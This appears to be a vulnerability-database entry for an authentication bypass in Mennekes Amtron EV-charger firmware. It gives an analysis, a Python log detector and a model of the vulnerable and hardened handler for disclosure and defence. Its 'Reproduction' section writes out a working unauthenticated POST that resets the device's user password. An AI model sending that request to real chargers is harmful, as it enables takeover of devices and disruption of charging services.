CVE-2026-8979
Description
The Mennekes Amtron series (firmware versions ≤ 5.22.3) is vulnerable to an authentication bypass. An unauthenticated remote attacker can change the password of the user account via a crafted POST request to the /operator/operator endpoint.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Authentication bypass in Mennekes Amtron series firmware ≤5.22.3 allows unauthenticated remote change of user password via crafted POST request.
Vulnerability
The Mennekes Amtron series (including Amtron Professional, Amtron Professional (Eichrecht), Amedio Professional, Amtron Charge Control, Amtron Professional Twincharge, and Smart-T PnC) with firmware versions ≤5.22.3 is vulnerable to an authentication bypass. The /operator/operator endpoint accepts a crafted POST request without authentication, allowing an attacker to change the user account password [1].
Exploitation
An unauthenticated remote attacker can send a POST request to /operator/operator with the parameter UserPwdPlain_custom set to a desired password. No prior authentication or user interaction is required [1]. No special headers are needed beyond those of an ordinary form submission (Content-Type: application/x-www-form-urlencoded).
Impact
Successful exploitation allows the attacker to change the user password, gaining unauthorized access to the device. This can lead to full device takeover, loss of control over the charging infrastructure, and potential disruption of EV charging services [1].
Mitigation
No official fix or firmware update has been released by Mennekes as of the publication date of the reference [1]. Until a patch is available, operators should restrict network access to the device and monitor for unauthorized requests to the /operator/operator endpoint.
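As an added example (not from the advisory or the vendor), the following Python script implements the monitoring suggested above over constructed access-log lines. It assumes a reverse proxy or network sensor in front of the charger records requests in an Apache-style combined format with the request's Cookie header appended as a final quoted field, that legitimate operator sessions carry a `sessionid` cookie, and that operators connect from 10.201.74.0/24; the log lines, addresses and cookie name are all assumptions for this example, not observed device output.

```python
import re
from ipaddress import ip_address, ip_network

TARGET_PATH = "/operator/operator"

# Constructed sample log lines (not real device logs). Assumed format: Apache
# combined log with the request's Cookie header appended as a final quoted field.
SAMPLE_LOG = """\
10.201.74.20 - - [28/May/2026:10:01:12 +0000] "GET /operator/operator HTTP/1.1" 200 4120 "-" "Mozilla/5.0" "sessionid=a1b2c3"
10.201.74.20 - - [28/May/2026:10:01:40 +0000] "POST /operator/operator HTTP/1.1" 200 512 "-" "Mozilla/5.0" "sessionid=a1b2c3"
203.0.113.45 - - [28/May/2026:10:05:03 +0000] "POST /operator/operator HTTP/1.1" 200 512 "-" "python-requests/2.31" "-"
10.201.74.99 - - [28/May/2026:10:07:55 +0000] "POST /operator/operator HTTP/1.1" 200 512 "-" "curl/8.4.0" "-"
203.0.113.45 - - [28/May/2026:10:08:10 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "python-requests/2.31" "-"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)" "(?P<cookie>[^"]*)"$'
)


def detect_password_change_abuse(log_text, allowed_nets=("10.201.74.0/24",)):
    """Return one alert per POST to the password-change endpoint that either
    comes from outside the operator network or carries no session cookie.
    The vulnerable firmware accepts such requests, so both conditions are
    worth an alert regardless of the status code the device returned."""
    nets = [ip_network(n) for n in allowed_nets]
    alerts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m is None:
            continue  # unparseable line; a real pipeline would count these
        if m["method"] != "POST" or m["path"].split("?", 1)[0] != TARGET_PATH:
            continue
        reasons = []
        if not any(ip_address(m["ip"]) in net for net in nets):
            reasons.append("source outside operator network")
        if "sessionid=" not in m["cookie"]:
            reasons.append("no session cookie on password-change POST")
        if reasons:
            alerts.append({"ip": m["ip"], "time": m["ts"], "status": m["status"],
                           "ua": m["ua"], "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in detect_password_change_abuse(SAMPLE_LOG):
        print(alert["time"], alert["ip"], alert["ua"], "; ".join(alert["reasons"]))
```

Run against the constructed lines, the script flags the two cookie-less POSTs (one from an external address, one from inside the operator subnet) and ignores the session-backed POST from the operator workstation; tightening `allowed_nets` to the management hosts that should ever reach the web interface is the cheapest way to cut noise.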
AI Insight generated on May 28, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products (1)
- Range: <=5.22.3
Patches (0)
No patches discovered yet.
Vulnerability mechanics
Root cause
"Missing authentication check on the password-change endpoint allows any unauthenticated remote attacker to overwrite the user account password."
Attack vector
An unauthenticated remote attacker sends a crafted POST request to the `/operator/operator` endpoint with the parameter `UserPwdPlain_custom` set to a new password value [ref_id=1]. The endpoint does not require any authentication or authorization check before processing the password change. The attacker can then use the newly set password to log in as the user account and gain access to the device. The advisory provides a proof-of-concept showing the request is sent over HTTP with no authentication headers [ref_id=1].
Affected code
The vulnerability exists in the `/operator/operator` endpoint of the Mennekes Amtron series web interface. The advisory does not specify a particular source file or function name, but the endpoint accepts a `UserPwdPlain_custom` parameter via POST request to change the user account password [ref_id=1].
What the fix does
The advisory does not include a patch or vendor fix. The recommended remediation is to restrict the `/operator/operator` endpoint so that password changes require prior authentication, and to validate that the requesting session is authorized to modify the target account [ref_id=1]. Without such controls, any unauthenticated party can overwrite the user password.
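To make the missing check concrete, here is an added Python model of the handler; it is not the vendor's firmware code, whose language and structure the advisory does not disclose. The vulnerable version applies `UserPwdPlain_custom` without looking at the session, as the advisory describes; the hardened version requires a valid session, lets a session change only its own account, and re-checks the current password before accepting the change. The `Device` class, the `sessionid` cookie, the `UserPwdOld` parameter and the PBKDF2 password storage are assumptions for this example.

```python
import hashlib
import hmac
import os

PBKDF2_ROUNDS = 100_000  # assumed storage parameters for this example


def hash_password(password, salt=None):
    salt = salt if salt is not None else os.urandom(16)
    return salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)


def verify_password(password, salt, digest):
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return hmac.compare_digest(candidate, digest)


class Device:
    """Minimal stand-in for the charger's web backend: one 'user' account
    and a table of session ids (assumed cookie name: sessionid)."""

    def __init__(self, user_password):
        self.accounts = {"user": hash_password(user_password)}
        self.sessions = {}  # session id -> account name

    def login(self, name, password):
        entry = self.accounts.get(name)
        if entry is None or not verify_password(password, *entry):
            return None
        sid = os.urandom(16).hex()
        self.sessions[sid] = name
        return sid


def vulnerable_operator_post(dev, request):
    """Behaviour the advisory describes: any POST carrying UserPwdPlain_custom
    overwrites the user password; the session is never consulted."""
    new_pw = request["form"].get("UserPwdPlain_custom")
    if new_pw is None:
        return 400
    dev.accounts["user"] = hash_password(new_pw)
    return 200


def hardened_operator_post(dev, request):
    """Same endpoint with the checks the fix needs, ordered so that an
    unauthenticated request is rejected before any state is touched."""
    account = dev.sessions.get(request["cookies"].get("sessionid"))
    if account is None:
        return 401  # no valid session: reject before even reading the form
    target = request["form"].get("account", account)
    if target != account:
        return 403  # a session may only change its own account's password
    salt, digest = dev.accounts[account]
    if not verify_password(request["form"].get("UserPwdOld", ""), salt, digest):
        return 403  # re-authenticate with the current password (UserPwdOld is assumed)
    new_pw = request["form"].get("UserPwdPlain_custom")
    if not new_pw or len(new_pw) < 8:
        return 400
    dev.accounts[account] = hash_password(new_pw)
    # Invalidate every session of the account so a stolen cookie dies with the change.
    dev.sessions = {s: a for s, a in dev.sessions.items() if a != account}
    return 200
```

The advisory's proof-of-concept maps to `{"cookies": {}, "form": {"UserPwdPlain_custom": "asdf"}}`: the vulnerable handler answers 200 and the attacker can log in as `user` with "asdf", while the hardened handler answers 401 and leaves the account untouched. Checking the session before parsing the form matters on small embedded web stacks, where a parser bug in the form handling would otherwise be reachable without authentication.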
Preconditions
- network: The attacker must have network access to the Mennekes Amtron device's web interface.
- auth: No authentication or session token is required.
Reproduction
Send the following POST request to the target device, replacing the Host IP as needed:
```
POST /operator/operator HTTP/1.1
Host: 10.201.74.66
Content-Type: application/x-www-form-urlencoded
Content-Length: 24

UserPwdPlain_custom=asdf
```
After the request succeeds, log in to the web interface using the user account with the new password "asdf" [ref_id=1].
Generated on May 28, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References (1)
News mentions (0)
No linked articles in our index yet.